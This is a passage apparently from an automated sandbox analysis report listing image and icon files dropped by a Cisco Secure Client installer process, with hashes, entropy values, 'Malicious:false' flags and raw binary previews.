                                                                                                                                      Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\ArrowDown.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3882
                                                                                                                                      Entropy (8bit):6.743390042757195
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcXLBz:iXHt+JcNgOSiS4XsAYNpf2ESNV7Bz
                                                                                                                                      MD5:3FFF593238B9889FAFEB8D0128212244
                                                                                                                                      SHA1:D7D9421F3DAB1DF9ED621322554EA78444513815
                                                                                                                                      SHA-256:FDA8EE98D597820B24B2AAE23909585D4E5BFD0FDC573F901FA6139A30D9A2F0
                                                                                                                                      SHA-512:4BC00D211799B3C09BA0BFBEB676E2F03A9E510D89CFBF4CFEEAAB47232A782E756F67B6194D551B7659741E1114D0BD648B88EDD02BE43C32D4E2BB2ACC1339
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\ArrowDownDisabled.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3884
                                                                                                                                      Entropy (8bit):6.749338244156901
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgJLkXf:iXHt+JcNgOSiS4XsAYNpf2ESNtg1kXf
                                                                                                                                      MD5:ECBD0E4A17836F184F084BF3D9170141
                                                                                                                                      SHA1:45E135215179398684C1D52BB8430D827577500D
                                                                                                                                      SHA-256:5734B02A7A809DC54D75C00E7137CE9F2BF85CE8050B6105016FEE5D5E1BA44B
                                                                                                                                      SHA-512:5EB8B7519E6F9EE518812B3F0D8DF3C3E6A73A899E70F853848C69551B783663111B62900837CF0F02098A7452EE3D8638839658B3724990BFA5C2BF148B8D05
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\ArrowUp.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3880
                                                                                                                                      Entropy (8bit):6.742220289284142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBcr:iXHt+JcNgOSiS4XsAYNpf2ESNVr
                                                                                                                                      MD5:3C512CF63246231506E533D6800FF3EB
                                                                                                                                      SHA1:CF02F3D7AD80DC48B900464D1F8D828F44213443
                                                                                                                                      SHA-256:C211B550E4DF39BDD1E7A39E7979EBFEAB155BDAEF2498A09D63B45713C30768
                                                                                                                                      SHA-512:ECE459102971594D5EB348FF9AA16E5EC0E7222594D63096289B566B07D020B534947D231E6C3CA1E139F407B9A5251933CF38C7BCEDAE693741499A9108D9D6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\ArrowUpDisabled.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3881
                                                                                                                                      Entropy (8bit):6.749191813135782
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ildHE8+JjpMNNa3OjboViS4nXsAYdPd3F58ZpiU54SN775OBQgI+P:iXHt+JcNgOSiS4XsAYNpf2ESNtgB
                                                                                                                                      MD5:C09256A999756AFFAE49A6E4346D910C
                                                                                                                                      SHA1:95158F9717019700B626D2A675F17C50853E436E
                                                                                                                                      SHA-256:D2913B404D604DD9F61952E0539DA5FCD742FC7E87F30CCC4263303DEC5F43B0
                                                                                                                                      SHA-512:D2DD40D4A8FBFEC4DFB2EF285880F103CB50D0AB461731915C15D8A4061E77C70513658419FF72925D90741FBD75079899E5293A107B7361B2142358534C94EA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR.............\9.....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\GUI.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):431993
                                                                                                                                      Entropy (8bit):4.565786626694248
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                      MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                      SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                      SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                      SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\about.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1807
                                                                                                                                      Entropy (8bit):7.846793911413473
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                      MD5:536C911881523B9F8402A481881992A0
                                                                                                                                      SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                      SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                      SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..;R#I..k.........1...h.@'..:.V...1'.q..kM...Ly..h..6J.=....Y.%E~...!..wVe... .. .. .. ....O;....I..UO...........R.........7...E)5W.d...Q.)J5.7\{....Q.W.P.R.a.@.*K......ab...Q.d..zV....^..m.C.t..U.Y.e..(.....x.J)...s.....)..XM....Y.._~Q......o#..........=.p+b.E..X..X.}.'..o...DJw..GJq.].^.%R.#..3.y<.s...5.......s.s....;>.Z.q.F./..r.Z...T..=.&H......z...~J/.%.....(.~.|R7...z.LV....+.........T....|L.1i<..Zc.]LO.;.@.:.?IU./..A.,.-.rGr!Z...'I.........6+^......a....n6~e6ejy.f.........\UC..\..i..s.r.U_.i..>......u...p...zb5..t|u.h.*gxD..}6T[i.jxO./..goc...9......(.[..........*.{.8.f.(..R..J8.za.;.t..aj./.5.^px....g[...]z...=.Q.Q.%.D...z2`.;.6.K9.26Tc'....)_...$..<.&.7v.....pQ..N....s.c...XX..x.>..O.....)&/IYm..=....7.A.......c$..R....T{.q......C..@.L.....]({..>y.:.e.#....ym.....g^.R.....v.$.M.B.E....^.xSF80......n|Ph./..%<.I...X.f..=.pz..~...a..O1.9g.m.Mp....n.v%D....w....F6.....{.".!.~.}..}.P.S.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\about_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):388
                                                                                                                                      Entropy (8bit):7.139959170245274
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                      MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                      SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                      SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                      SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....6IDATH...M.0.E.L....&hG..t...f.........F`.l..}n.....B..).....}.p.k....x..3n|oI.^..G._~%..3...7~.^...#D..]/.lD.....{...#..:...k..+n.U.....)".]'g...9Y...G.w^v.&.FX{....".i.k.:..bN.......b.(H......8.y. .E...s$.V.....U.sOwFo.#...a;:....2.....=.....P...ct.k.A..-....Q...<..R...$.FX.-M......k.W...b.}2o.....p.........IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\about_hover.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1916
                                                                                                                                      Entropy (8bit):7.856747119568193
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                      MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                      SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                      SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                      SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\about_hover_24.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):421
                                                                                                                                      Entropy (8bit):7.268682924293009
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                      MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                      SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                      SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                      SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\amp_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12558
                                                                                                                                      Entropy (8bit):7.968059020803266
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                      MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                      SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                      SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                      SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\amp_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2860
                                                                                                                                      Entropy (8bit):7.914852791051157
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                      MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                      SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                      SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                      SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\app_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):51094
                                                                                                                                      Entropy (8bit):7.977081753425093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                      MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                      SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                      SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                      SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\attention.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.7071518309363354
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                      MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                      SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                      SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                      SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\res\cisco_blue.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
